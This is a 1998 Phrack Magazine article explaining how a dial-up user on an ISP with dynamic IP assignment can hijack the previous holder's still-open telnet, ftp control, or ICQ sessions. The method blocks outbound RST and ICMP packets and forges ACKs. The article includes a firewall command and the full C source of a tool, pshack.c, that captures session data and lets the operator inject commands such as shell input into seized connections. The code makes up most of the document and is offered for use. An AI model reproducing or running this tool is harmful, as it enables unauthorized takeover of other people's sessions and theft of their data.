---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 07 of 12


-------------------------[  Scavenging Connections On Dynamic-IP Networks


--------[  Seth McGann <smm@wpi.edu> (www.el8.org) 11.29.98
	


----[  Purpose

This paper will highlight a potentially serious loophole in networks that rely
on dynamic IP assignment.  More specifically, dial-up dynamic IP assignment
provided by almost every Internet Service Provider.  This problem will allow
the unauthorized use of the previous host's connections, for instance, in
progress telnet and ftp control sessions.  This issue is reminiscent of the
problem where terminal servers would sometimes provide an already logged in
session to a user lucky enough to call precisely after a forced disconnect due
to line noise or other outside factor.


----[  The Problem

To perform this feat we rely on some well know concepts, usually employed for
non-blind spoofing or session hijacking.  First, we have to understand what
a connection looks like after an abrupt loss of service.  The key point is
that the connection does not simply disappear, because there is no way for the
disconnected host to notify the remote end that it has lost its link.  If the
remote end tries to send more data and there is no host available, the upstream
router will generate an ICMP unreachable and the connection will be terminated.
If another dial-up user connects before the remote end has sent any more data
the story is different.  For a TCP based connection, the kernel will see a
packet going to an unconnected port, usually with PUSH and ACK set or simply
ACK, and will generate a RST, ending the connection.  For an incident UDP
packet, an ICMP unreachable is generated.  Either way the connection will
evaporate.


----[  The Solution

Solving the problem is twofold.  We must first prevent the kernel from killing
the connections and second we must make sure the remote end knows we are still
alive, to prevent timeouts.  For UDP the answer is very simple.  As long as we
block outbound ICMP unreachable packets the remote end won't disconnect.
Application timeouts must be dealt with, of course.  For TCP we have a bigger
problem, since the connections will die if not responded to.  To prevent our
poisonous RST packets from reaching the remote side we simply block all
outbound TCP traffic.  To keep the dialogue going, we simply ACK all incident
PUSH|ACK packets and increment the ACK and SEQ numbers accordingly.  We
recover data from packets with the PUSH flag set.  Additionally we can
send data back down the connection by setting the PUSH and ACK flags on
our outbound packets.


----[  Implementation

To stop our kernel from killing the latent connections, we first block all
outbound traffic. Under linux a command such as the following would be
effective:

/sbin/ipfwadm -O -a deny -S 0.0.0.0/0  -P all -W ppp0

Now, no RST packets or ICMP will get out.  We are essentially turning off
kernel networking support and handling all the details ourselves.  This will
not allow us to send using raw sockets, unfortunately.  SOCK_PACKET could
be used, but in the interests of portability the firewall is simply opened
to send a packet and then closed.  To be useful on a larger number of
platforms, libpcap 0.4 was used for pulling packets off the wire and
Libnet 0.8b was used for putting them back again.  The program itself is
called pshack.c because that's basically all it does.  Additionally, it will
allow you respond to in progress connections just in case you find a root
shell.  It will also accept inbound connections, and allow you to reply to
them.  Note, this will only work on Linux right now, due to the differences in
handling of the firewall.  This is very minor and will be fixed soon.  It
should compile without incident on RedHat 5.1 or 4.2 and on Slackware as well,
given one change to the ip firewall header file, namely taking out the
#include <linux/tcp.h> line.


----[  Conclusions

Using this program it is easy to scavenge telnet and ftp control sessions,
or basically any low traffic, idle connection.  Grabbing ICQ sessions is a
good example of a UDP based scavenge.  Obviously, streaming connections,
such as ftp data will be ICMP to death before they can be scavenged.  It's
interesting to note that hosts that drop ICMP unreachable packets, for fear
of forged unreachable packets, are particularly vulnerable as they will not
lose the connection as quickly.

Required:

libpcap 0.4  -> ftp://ftp.ee.lbl.gov/libpcap.tar.Z
Libnet  0.8b -> http://www.infonexus.com/~daemon9/Projects/Libnet/

<++> scavenge/pshack.c
/* - PshAck.c - Attempts to scavenge connections when you dial up an ISP.
 *   Author:    Seth McGann <smm@wpi.edu> / www.el8.org (Check papers section)
 *   Date:      11/29/98
 *   Greets:    dmess0r,napster,awr,all things w00w00,#203
 *   Version:   0.3
 *
 *   Usage:
 *              1.  Dial up your ISP and start pshack up.
 *              2.  If you are lucky you will see connections you did not
 *		    make :)
 *              3.  Repeat the procedure.
 *   Options:
 *             -i: The interface
 *             -l: Link offset
 *             -s: Your source IP
 *
 *   Compiling: 'gcc pshack.c -o pshack -lnet -lpcap' should work given you have
 *              libpcap and Libnet installed properly.
 *
 *              libpcap 0.4 : ftp://ftp.ee.lbl.gov/libpcap.tar.Z
 *              Libnet  0.8b: http://www.infonexus.com/~daemon9/Projects/Libnet/
 *
 *   Have fun!
 */

#define __BSD_SOURCE
#include <netinet/udp.h>
#define __FAVOR_BSD
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <syslog.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <libnet.h>
#include <pcap.h>
#include <netinet/ip_fw.h>
#include <setjmp.h>

/* #define DEBUGIT */

#ifdef DEBUGIT
#define DEFAULT_INTERFACE "eth1"
#define DEFAULT_OFFSET    14
#else
#define DEFAULT_INTERFACE "ppp0"   /* Default is PPP with no linklayer */
#define DEFAULT_OFFSET    0
#endif

struct conn {
	u_int    type;
	u_long   src,dst,seq,ack;
	u_short  sport,dport;
};

void clean_exit(int);
void time_out(int);
void usage(char *);
void dump_packet( u_char *, int );
int update_db( u_char *, int, struct conn*);
void dump_db (struct conn*);

char errbuf[2000];
sigjmp_buf env;



int
main (int argc, char **argv) {

	struct ip     *ip_hdr;
	struct tcphdr *tcp_hdr;
	struct udphdr *udp_hdr;
	struct ip_fw  fw;
	struct ifreq  ifinfo;
	struct pcap_pkthdr ph;
	pcap_t        *pd;
	u_long        local=0,seq,ack;
	u_short	      flags=0;
	u_char        *d_ptr,*packet;
	u_char	      *pbuf=malloc(TCP_H+IP_H+500);
	char 	      iface[17],sendbuf[500];
	int           osock,sfd,linkoff,i,datalen,newsize,dbsize=0;
	struct conn   conn[100];         /* WAY more than enough */
	char arg;	
        fd_set rfds;
        struct timeval tv;
        int retval;
	char user[500];
	
	
        strcpy(iface,DEFAULT_INTERFACE);
        linkoff=DEFAULT_OFFSET;

	while((arg = getopt(argc,argv,"i:s:l:")) != EOF){
            switch(arg) {
	          case 's':
	          local=inet_addr(optarg);
	          break;
	          case 'i':
	          strncpy(iface,optarg,16);
	          break;
	          case 'l':
	          linkoff=atoi(optarg);
	          break;
	          default:
	          usage(argv[0]);
	          break;
	     }
        }

	printf("* Blocking till %s comes up *\n",iface);
	
        do {pd=pcap_open_live(iface,1500,0,500,errbuf);}while(!pd);
	
	printf("* Configuring Raw Output *\n");
	osock=open_raw_sock(IPPROTO_RAW);
        if (osock<0)perror("socket()"),exit(1);
	strcpy(ifinfo.ifr_ifrn.ifrn_name,iface);
        if(ioctl(osock,SIOCGIFFLAGS,&ifinfo)<0)perror("ioctl()"),exit(1);
        if(ioctl(osock,SIOCSIFFLAGS,&ifinfo)<0)perror("ioctl()"),exit(1);
        if(ioctl(osock,SIOCGIFADDR,&ifinfo)<0)perror("ioctl()"),exit(1);
	
        bcopy(&ifinfo.ifr_addr.sa_data[2],&local,4);
	printf("* Address: %s\n",host_lookup(local,0));

        printf("* Blocking Outbound on %s *\n",iface);
	sfd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
        if(sfd<0) perror("socket()"),exit(1);

	bzero(&fw,sizeof(fw));
        strcpy(fw.fw_vianame,iface);
        #ifdef DEBUGIT
	fw.fw_flg=IP_FW_F_ICMP;
        if(setsockopt(sfd,IPPROTO_IP,IP_FW_INSERT_OUT,&fw,sizeof(fw))<0)
        perror("setsockopt()"),exit(1);
	fw.fw_flg=IP_FW_F_TCP;
        fw.fw_nsp=1;
        fw.fw_pts[0]=666;
        #endif
        if(setsockopt(sfd,IPPROTO_IP,IP_FW_INSERT_OUT,&fw,sizeof(fw))<0)
        perror("setsockopt()"),exit(1);

	signal(SIGTERM,clean_exit);
	signal(SIGINT,clean_exit);
	signal(SIGALRM,time_out);	

	printf("* Entering Capture Loop *\n\n");
	printf("* Commands [1] Dump databese\n"
	       "           [2] Send on connection <n> Ex: 2 1 ls -al\n"
	       "           [3] Exit\n\n");
	sigsetjmp(env,1);
	
	FD_ZERO(&rfds);
        FD_SET(0, &rfds);
        tv.tv_sec = 0;
	tv.tv_usec = 0;

        retval = select(1, &rfds, NULL, NULL, &tv);
	
	if (retval) {
	   retval=read(1,user,sizeof(user));
	   user[retval]=0;
	   switch(user[0]) {
             case '1':
       	     dump_db(conn);
             break;
	     case '2':
	     i=atoi(&user[2]);
	     if (i > dbsize) {
	         printf("* Invalid connection index) *\n");
	         break;
             }
             build_ip(TCP_H,
           	      101,
		      0,
           	      IP_DF,
	       	      128,
		      IPPROTO_TCP,
		      local,
         	      htonl(conn[i].src),
	     	      NULL, 0, pbuf);
	
	     build_tcp(conn[i].dport,
		       conn[i].sport,
		       conn[i].seq,
                       conn[i].ack,
		       TH_PUSH|TH_ACK, 31000, 0,user+4,strlen(user+4),
                           pbuf + IP_H);

	     do_checksum(pbuf, IPPROTO_TCP, TCP_H+strlen(user+4));
	     setsockopt(sfd,IPPROTO_IP,IP_FW_DELETE_OUT,&fw,sizeof(fw));
	     write_ip(osock, pbuf, TCP_H + IP_H + strlen(user+4));
             setsockopt(sfd,IPPROTO_IP,IP_FW_INSERT_OUT,&fw,sizeof(fw));

 	     printf("Sent: %s\n",user+4);
             break;
	     case '3':
	     clean_exit(1);
	     break;
	     default:
             break;
           }
	}
	alarm(1);
	
	for(;packet=pcap_next(pd,&ph);) {
	
        ip_hdr = (struct ip *)(packet + linkoff);
	
	switch(ip_hdr->ip_p) {
	
	case IPPROTO_TCP:
             tcp_hdr=(struct tcphdr*)(((char*)ip_hdr)+(4*ip_hdr->ip_hl));
	     dump_packet(packet,linkoff);
	     #ifdef DEBUGIT
	     if ((ntohl(ip_hdr->ip_src.s_addr) != local) &&
		 ntohs(tcp_hdr->th_dport)==666) {
	     #else
	     if (ntohl(ip_hdr->ip_src.s_addr) != local) {
	     #endif
	     newsize=update_db(packet, linkoff, conn);

	     if(newsize>dbsize) {
             printf("New Connect:\n");
             dbsize=newsize;}

	     if (tcp_hdr->th_flags&TH_PUSH || (tcp_hdr->th_flags&TH_SYN &&
	 	 tcp_hdr->th_flags&TH_ACK)) {
		 datalen=ntohs(ip_hdr->ip_len)-IP_H-TCP_H;
		 if(!datalen) datalen++;

	         seq=ntohl(tcp_hdr->th_ack);
		 ack=ntohl(tcp_hdr->th_seq)+datalen;
		 flags=TH_ACK;
  		 } else if(tcp_hdr->th_flags&TH_SYN) {
		 seq=get_prand(PRu32);
		 ack=ntohl(tcp_hdr->th_seq)+1;
		 flags=TH_SYN|TH_ACK;
	      	 }

	         if(flags) {
                 build_ip(TCP_H,
			  101,
			  0,
		 	  IP_DF,
	       		  128,
			  IPPROTO_TCP,
			  local,
                          ip_hdr->ip_src.s_addr,
			  NULL, 0, pbuf);
	
		 build_tcp(ntohs(tcp_hdr->th_dport),
		           ntohs(tcp_hdr->th_sport),
		           seq,
                           ack,
		           flags, 31000, 0, NULL, 0, pbuf + IP_H);

		 do_checksum(pbuf, IPPROTO_TCP, TCP_H);
		 setsockopt(sfd,IPPROTO_IP,IP_FW_DELETE_OUT,&fw,sizeof(fw));
                 write_ip(osock, pbuf, TCP_H + IP_H);
                 setsockopt(sfd,IPPROTO_IP,IP_FW_INSERT_OUT,&fw,sizeof(fw));
		 flags=0; }
	     }
	     break;
	
	case IPPROTO_UDP:
	     dump_packet(packet,linkoff);
	     break;
	default:
	break;
	    }
	  }

}


void
dump_packet( u_char *packet, int linkoff ) {

	struct ip     *ip_hdr;
	struct tcphdr *tcp_hdr;
	struct udphdr *udp_hdr;
	u_char        *d_ptr;
	u_int         i;

	ip_hdr = (struct ip *)(packet + linkoff);
	
	switch (ip_hdr->ip_p) {
	
	case IPPROTO_TCP:
	tcp_hdr=(struct tcphdr*)(((char*)ip_hdr)+(4*ip_hdr->ip_hl));
	
	printf("********************\n");
	printf("TCP: %s.%d->%s.%d SEQ: %u ACK: %u\n "
	       "Flags: %c%c%c%c%c%c Data Len: %d\n",
		host_lookup(ip_hdr->ip_src.s_addr,0),
		ntohs(tcp_hdr->th_sport),
		host_lookup(ip_hdr->ip_dst.s_addr,0),
		ntohs(tcp_hdr->th_dport),
	        ntohl(tcp_hdr->th_seq),
	        ntohl(tcp_hdr->th_ack),	
	        (tcp_hdr->th_flags & TH_URG)  ? 'U' : '-',
                (tcp_hdr->th_flags & TH_ACK)  ? 'A' : '-',
                (tcp_hdr->th_flags & TH_PUSH) ? 'P' : '-',
                (tcp_hdr->th_flags & TH_RST)  ? 'R' : '-',
                (tcp_hdr->th_flags & TH_SYN)  ? 'S' : '-',
                (tcp_hdr->th_flags & TH_FIN)  ? 'F' : '-',
                ntohs(ip_hdr->ip_len)-IP_H-TCP_H);
	
		d_ptr=packet+linkoff+TCP_H+IP_H;

                for(i=0;i<(ntohs(ip_hdr->ip_len)-IP_H-TCP_H);i++)
                   if (d_ptr[i]=='\n')
		      printf("\n");
                   else if (d_ptr[i]>0x1F && d_ptr[i]<0x7F)
		           printf("%c",d_ptr[i]);
                        else
                           printf (".");

		printf("\n");
		break;

	case IPPROTO_UDP:

	udp_hdr=(struct udphdr*)(((char*)ip_hdr) + (4 * ip_hdr->ip_hl));
	printf("********************\n");
	printf("UDP: %s.%d->%s.%d Data Len: %d\n",
               host_lookup(ip_hdr->ip_src.s_addr,0),
               ntohs(udp_hdr->uh_sport),
               host_lookup(ip_hdr->ip_dst.s_addr,0),
               ntohs(udp_hdr->uh_dport),
	       ntohs(ip_hdr->ip_len)-IP_H-UDP_H);

	d_ptr=packet+linkoff+UDP_H+IP_H;
        for(i=0;i<(ntohs(udp_hdr->uh_ulen)-UDP_H);i++)
            if (d_ptr[i]=='\n')
               printf("\n");
            else if (d_ptr[i]>0x19 && d_ptr[i]<0x7F)
                    printf("%c",d_ptr[i]);
                 else
		    printf(".");
	
	printf("\n");
	break;

 	default:
	/* We ignore everything else */
	break;
	}
	
}

void
clean_exit(int val) {

	int sfd,p=0;

        sfd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
        if (sfd<0) perror("socket()"),exit(1);
        if(setsockopt(sfd,IPPROTO_IP,IP_FW_FLUSH_OUT,&p,sizeof(p))<0)
        perror("setsockopt()"),exit(1);
        exit(0);
}


void
usage(char *arg) {
       	printf("%s: [options]\n"
               "  -i: The interface\n"
	       "  -l: Link offset\n"
               "  -s: Your source IP\n\n",arg);
        exit(0);
}

void
dump_db (struct conn *conn) {

	int i;
	

	for(i=0;conn[i].type;i++)
	   if(conn[i].type==IPPROTO_TCP)
	   printf("%d: TCP: %s.%d->%s.%d SEQ: %u ACK: %u\n",
	           i, host_lookup(htonl(conn[i].src),0),conn[i].sport,
	           host_lookup(htonl(conn[i].dst),0), conn[i].dport,
	           conn[i].seq,conn[i].ack);
	   else if(conn[i].type==IPPROTO_UDP)
	   printf("%d: UDP: %s.%d->%s.%d\n",
	           i, host_lookup(htonl(conn[i].src),0),conn[i].sport,
	           host_lookup(htonl(conn[i].dst),0), conn[i].dport);
	  else break;


}


int
update_db( u_char *packet, int linkoff, struct conn *conn) {
	struct ip     *ip_hdr;
	struct tcphdr *tcp_hdr;
	struct udphdr *udp_hdr;
	int i=0;
	ip_hdr = (struct ip *)(packet + linkoff);

	switch(ip_hdr->ip_p) {

	case IPPROTO_TCP:
	tcp_hdr=(struct tcphdr*)(((char*)ip_hdr)+(4*ip_hdr->ip_hl));

	for(i=0;conn[i].type;i++)
	   if(conn[i].type==IPPROTO_TCP)
	    if(ip_hdr->ip_src.s_addr==htonl(conn[i].src))
             if(ip_hdr->ip_dst.s_addr==htonl(conn[i].dst))
	      if(ntohs(tcp_hdr->th_sport)==conn[i].sport)
	       if(ntohs(tcp_hdr->th_dport)==conn[i].dport)
                    break;

	if(conn[i].type) {
          conn[i].seq=ntohl(tcp_hdr->th_ack);
	  conn[i].ack=ntohl(tcp_hdr->th_seq); }
        else {
	  conn[i].type=IPPROTO_TCP;
	  conn[i].src=ntohl(ip_hdr->ip_src.s_addr);
	  conn[i].dst=ntohl(ip_hdr->ip_dst.s_addr);
	  conn[i].sport=ntohs(tcp_hdr->th_sport);
	  conn[i].dport=ntohs(tcp_hdr->th_dport);
          conn[i].seq=ntohl(tcp_hdr->th_ack);
	  conn[i].ack=ntohl(tcp_hdr->th_seq); }		

	break;

	case IPPROTO_UDP:
	udp_hdr=(struct udphdr*)(((char*)ip_hdr)+(4*ip_hdr->ip_hl));

	for(i=0;conn[i].type;i++)
          if(conn[i].type==IPPROTO_TCP)
	    if(ntohl(ip_hdr->ip_src.s_addr)==conn[i].src)
       	     if(ntohl(ip_hdr->ip_dst.s_addr)==conn[i].dst)
	       if(ntohs(udp_hdr->uh_sport)==conn[i].sport)
	         if(ntohs(udp_hdr->uh_dport)==conn[i].dport) break;

	if(!conn[i].type) {
	  conn[i].type=IPPROTO_UDP;
	  conn[i].src=ntohl(ip_hdr->ip_src.s_addr);
	  conn[i].dst=ntohl(ip_hdr->ip_dst.s_addr);
	  conn[i].sport=ntohs(udp_hdr->uh_sport);
	  conn[i].dport=ntohs(udp_hdr->uh_dport); }

	break;
	default:
	/* We Don't care */
	break;
      }
      return i;

}

void
time_out(int blank) {
alarm(0);
siglongjmp(env,1);
}

/* EOF */
<-->

----[  EOF